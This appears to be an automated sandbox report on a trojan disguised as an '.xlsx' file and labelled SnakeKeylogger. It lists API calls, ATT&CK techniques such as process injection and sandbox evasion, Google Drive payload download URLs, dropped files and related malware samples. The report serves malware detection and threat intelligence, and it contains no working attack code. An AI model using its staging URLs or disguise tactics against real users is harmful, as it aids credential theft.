Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007420000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2758062431.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	API call chain: ExitProcess graph end node			graph_0-4744
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	API call chain: ExitProcess graph end node			graph_0-4745

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_00402C44 LdrInitializeThunk,RegOpenKeyExW,

0_2_00402C44

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062B2

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"

Jump to behavior

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe

Code function: 0_2_00405F6A GetVersion,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryW,LdrInitializeThunk,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F6A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
09-FD-94.03.60.175.07.xlsx.exe	55%	ReversingLabs	Win32.Trojan.SnakeKeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://drive.usercontef	0%	Avira URL Cloud	safe
https://drive.goF	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.174	true	false	high
drive.usercontent.google.com	142.250.181.1	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/;	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/letagservices-cn.com	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/recaptcha.net.cn	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677626588.00000000074B5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3355352985.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3513923547.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2420547261.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074AC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224953298.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198125430.00000000074B7000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.00000000074AA000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.0000000007454000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/7	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/qf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/R	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/r	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEfl	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706592766.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834777087.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.00000000074B5000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861593384.00000000074BC000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3993352675.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3706467827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3834655419.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861710802.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3541195078.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3861400825.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3994935047.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3677479359.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/download?id=1DRkx	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3382677279.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3224756606.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731190068.000000000744C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884426323.0000000007454000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	09-FD-94.03.60.175.07.xlsx.exe	false		high
https://drive.google.com/i	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3351962992.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/G	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2575572170.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/E	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3510931834.00000000074AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontef	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2604318425.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/catig	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/tagmanager.com	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2884260070.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/ificate	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.4024417346.0000000007435000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/t/allowlist	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2757969219.000000000746E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731158586.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2731080032.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.goF	09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2911319827.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198290146.000000000746D000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070445267.000000000746C000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3198016492.0000000007466000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.3070062158.0000000007466000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.1	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
172.217.19.174	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576274
Start date and time:	2024-12-16 18:03:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	09-FD-94.03.60.175.07.xlsx.exe
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@3/10@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 48 Number of non-executed functions: 76
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.53.7, 20.103.156.88, 13.107.246.63, 52.149.20.212, 20.223.35.26, 2.16.158.72, 20.234.120.54, 150.171.28.10, 2.16.158.74, 23.218.208.109
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com
Execution Graph export aborted for target 09-FD-94.03.60.175.07.xlsx.exe, PID 5412 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 09-FD-94.03.60.175.07.xlsx.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	wf1Ps82LYF.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	YPgggL1oh7.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	SPHINX.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	AV4b38nlhN.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	fm2r286nqT.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	msimg32.dll	Get hash	malicious	RHADAMANTHYS	Browse	192.229.221.95
	YBkzZEtVcK.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	xGW5bGPCIg.exe	Get hash	malicious	Cryptbot	Browse	192.229.221.95
	SOjID1t3un.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	https://t.co/eSJUUrWOcO	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	142.250.181.1 172.217.19.174
	TEC-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	142.250.181.1 172.217.19.174
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.181.1 172.217.19.174
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	142.250.181.1 172.217.19.174
	InvoiceNr274728.pdf.lnk	Get hash	malicious	LummaC	Browse	142.250.181.1 172.217.19.174
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	142.250.181.1 172.217.19.174
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	142.250.181.1 172.217.19.174
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	142.250.181.1 172.217.19.174
	njrtdhadawt.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.181.1 172.217.19.174

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse
	TEC-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse
	Purchase-Order27112024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	563299efce875400a8d9b44b96597c8e-sample (1).zip	Get hash	malicious	Unknown	Browse
	debit-note-19-08-dn-2024.exe	Get hash	malicious	GuLoader	Browse
	debit-note-19-08-dn-2024.exe	Get hash	malicious	GuLoader	Browse
	HE9306_AWBLaser_Single240812144358.exe	Get hash	malicious	GuLoader	Browse
	HE9306_AWBLaser_Single240812144358.exe	Get hash	malicious	GuLoader	Browse
	z41_EX24-772_24.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BooConf.ini

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	45
Entropy (8bit):	4.7748605961854445
Encrypted:	false
SSDEEP:	3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
MD5:	8B9FC0443D7E48145E2D4B37AFB2D37B
SHA1:	64A5718A478A38AC262D2E46DA81D0E88C122A0F
SHA-256:	4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
SHA-512:	5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.656006343879828
Encrypted:	false
SSDEEP:	192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
MD5:	3E6BF00B3AC976122F982AE2AADB1C51
SHA1:	CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
SHA-256:	4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
SHA-512:	1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
